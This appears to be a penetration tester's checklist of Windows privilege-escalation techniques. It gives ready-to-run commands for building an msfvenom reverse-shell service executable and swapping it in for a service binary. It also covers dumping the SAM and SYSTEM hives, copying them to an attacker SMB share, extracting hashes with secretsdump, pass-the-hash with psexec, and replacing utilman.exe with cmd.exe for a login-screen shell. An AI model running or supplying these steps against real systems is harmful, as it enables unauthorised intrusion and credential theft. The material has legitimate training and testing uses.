Checklist - Windows
Unattended install remnants
When installing Windows on a large number of hosts, administrators may use Windows Deployment Services, which allows for a single operating system image to be deployed to several hosts through the network. These kinds of installations are referred to as unattended installations as they don't require user interaction. Such installations require the use of an administrator account to perform the initial setup, which might end up being stored in the machine in the following locations:
Installed software registry saved credentials
Putty
Grab putty creds
Powershell + Cmd history
Whenever a user runs a command using Powershell, it gets stored into a file that keeps a memory of past commands. This is useful for repeating commands you have used before quickly. If a user runs a command that includes a password directly as part of the Powershell command line, it can later be retrieved.
Windows allows us to use other users' credentials. This function also gives the option to save these credentials on the system.
Scheduled Tasks
Looking into scheduled tasks on the target system, you may see a scheduled task that either lost its binary or it's using a binary you can modify.
If our current user can modify or overwrite the "Task to Run" executable, we can control what gets executed by the other user, resulting in a simple privilege escalation.
AlwaysInstallElevated
Windows installer files (also known as .msi files) are used to install applications on the system. They usually run with the privilege level of the user that starts it. However, these can be configured to run with higher privileges from any user account (even unprivileged ones). This could potentially allow us to generate a malicious MSI file that would run with admin privileges.
Services
Windows services are managed by the Service Control Manager (SCM). The SCM is a process in charge of managing the state of services as needed, checking the current status of any given service and generally providing a way to configure services.
Each service on a Windows machine will have an associated executable which will be run by the SCM whenever a service is started. It is important to note that service executables implement special functions to be able to communicate with the SCM, and therefore not any executable can be started as a service successfully. Each service also specifies the user account under which the service will run.
Location: HKLM\SYSTEM\CurrentControlSet\Services\
Weak permissions
#CHECK IF ANY SERVICE HAS WEAK PERMISSIONS #PRint details about service such has linked executable sc qc vulnerable-service #CHECK LINKED EXECUTABLE PERMISSIONS, HOPEFULLY WE CAN MODIFY (M) icacls C:\program files\somecompany\Service.exe #IF WE CAN MODIFY AN EXECUTABLE LINKED TO A SERVICE, CREATE MALICIOUS EXE-SERVICE EXECUTABLE AND UPLOAD IT msfvenom -p windows/x64/shell_reverse_tcp LHOST= LPORT=6969 -f exe-service -o malicious-svc.exe #Make backup of old service executable and then copy malicious to original location copy C:\program files\somecompany\Service.exe C:\temp\Service.backup copy C:\temp\malicious-svc.exe C:\program files\somecompany\Service.exe #RESTART SERVICE (if able) sc stop vulnerable-service sc start vulnerable-service
#CHECK FOR UNQUOTED BINARY_PATH_NAME IN SERVICE sc qc "some mtg service" #IF BINARY_PATH_NAME IS NOT DOUBLE-QUOTED, WE MIGHT BE ABLE TO HIJACK, e.g: BINARY_PATH_NAME : C:\MyPrograms\Magic The Gathering\bin\mtg.exe #TRY PUTTING A MALICIOUS EXE IN EVERY POSSIBLE LOCATIONS C:\MyPrograms\Magic.exe, C:\MyPrograms\Magic The.exe, C:\MyPrograms\Magic The Gathering.exe
#check current privileges whoami /priv ######################## #SEBACKUP / SERESTORE privs ######################## #WITH SUCH PRIVS WE CAN DUMP REGISTRY/CREDS #Dump Registry hive for local analysis reg save hklm\system C:\Users\victim\system.hive reg save hklm\sam C:\Users\victim\sam.hive
#Start a local SMB server to transfer files and copy/transfer them attacker: python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support -username victim -password victimpassword public share victim: copy C:\Users\user\system.hive \attacker-ip\public\
#Parse hive python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -sam sam.hive -system system.hive LOCAL
#IF SUCCESSFUL DUMP, start cracking it and pass-the-hash #TRy psexec python3 /usr/share/doc/python3-impacket/examples/psexec.py -hashes aad3h73h:1238d8 Administrator@
######################## #SeTakeOwnership privs ######################## #WITH SUCH PRIVS WE CAN TAKE OWNERSHIP OF ANY OBJECT (FILES, REGKEYS, ETC) #A nice trick is to replace a system file such as utilman.exe which can be launched at login screen takeown /f C:\Windows\System32\Utilman.exe #OWNING A FILE DOES NOT MEAN HAVING PRIVILEGES, BUT WE CAN ADD SAID PRIVS AFTER OWNING icacls C:\Windows\System32\Utilman.exe /grant our-current-user:F #NOW THAT WE HAVE OWNERSHIP+PRIVS, LETS REPLACE IT WITH A MALICIOUS EXE OR JUST A CMD copy C:\Windows\System32\cmd.exe C:\Windows\System32\utilman.exe #YOU CAN NOW LOCK OR RESTART AND OPEN THE EASE-OF-ACCESS MENU TO GET A SHELL
######################## #SeImpersonate / SeAssignPrimaryToken ######################## #https://decoder.cloud/2019/12/06/we-thought-they-were-potatoes-but-they-were-beans/ #Tool: https://github.com/antonioCoco/RogueWinRM
Last updated